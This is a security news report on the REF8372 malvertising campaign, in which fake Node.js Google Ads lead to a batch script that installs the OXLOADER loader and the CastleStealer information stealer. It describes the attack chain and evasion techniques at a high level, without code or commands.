A new malvertising campaign is actively deploying a novel malware loader, **OXLOADER**, which subsequently delivers the **CastleStealer** information stealer. The campaign, tracked as **REF8372** by **Elastic Security Labs**, initiates through deceptive **Google Ads** targeting unsuspecting users. Evidence suggests the threat actor behind **REF8372** is likely Russian-speaking and financially motivated, indicated by explicit exclusions designed to prevent infections within the Commonwealth of Independent States (CIS) region. ### Sophisticated Evasion Techniques **OXLOADER** is engineered with multiple layers of obfuscation, including control-flow flattening, opaque predicates, and mixed Boolean-Arithmetic. It also utilizes self-modifying decryption stubs and abuses the **Windows .reloc** section for shellcode staging, as detailed by researchers Daniel Stepanic and Jia Yu Chan. ### The Attack Chain The attack begins when users search for queries such as "lts version of node.js" on search engines. Malicious **Google Ads**, published under the verified name "ВОЛОДИМИР ТЕРЕЩЕНКО" (purportedly based in Ukraine), redirect users to a fake website, `node-js[.]prentiva99[.]info`. It remains unclear if the advertiser account is directly linked to the threat actor or if it's a compromised or purchased identity. **Google** has since removed the advertiser account and its associated campaigns on May 14, 2026. Users interacting with the fake site are served a batch script hosted on **Storj**, a decentralized cloud storage platform. This abuse of legitimate services like **Storj** highlights a growing trend among threat actors to circumvent domain-based reputation filters.  Executing the batch script displays a deceptive installation wizard UI while silently downloading the **OXLOADER** executable, also hosted on **Storj**, via a **PowerShell** command. This command uses `-Verb RunAs` to trigger a **Windows User Account Control (UAC)** prompt, elevating privileges.  **OXLOADER** then employs **DLL side-loading** to launch a rogue DLL, which decrypts and executes the **CastleStealer** payload. Beyond control-flow flattening (CFF) and mixed Boolean-Arithmetic (MBA), **OXLOADER** also incorporates anti-VM measures to detect and avoid sandboxed environments, further hindering analysis. ### CastleStealer's Continued Presence **CastleStealer** is a .NET information stealer that has been observed in other campaigns, notably distributed alongside **CastleLoader** through a **ClickFix**-style lure masquerading as a free image-editing tool in a campaign known as **BackgroundFix**. **CastleLoader** itself is attributed to **GrayBravo**, a known threat activity cluster. **Elastic Security Labs** emphasizes the sophistication of **OXLOADER**, stating, "**OXLOADER** is in an early operational phase, but the engineering behind it suggests this family is worth watching. The code obfuscation, anti-VM measures, benign-looking code used to masquerade its binaries, and unique staging techniques reflect deliberate engineering choices to evade analysis." This investment in evasion is proving effective, resulting in low detection rates across static engines and detonation runs, allowing **OXLOADER** a significant operational window before it is fully recognized and countered.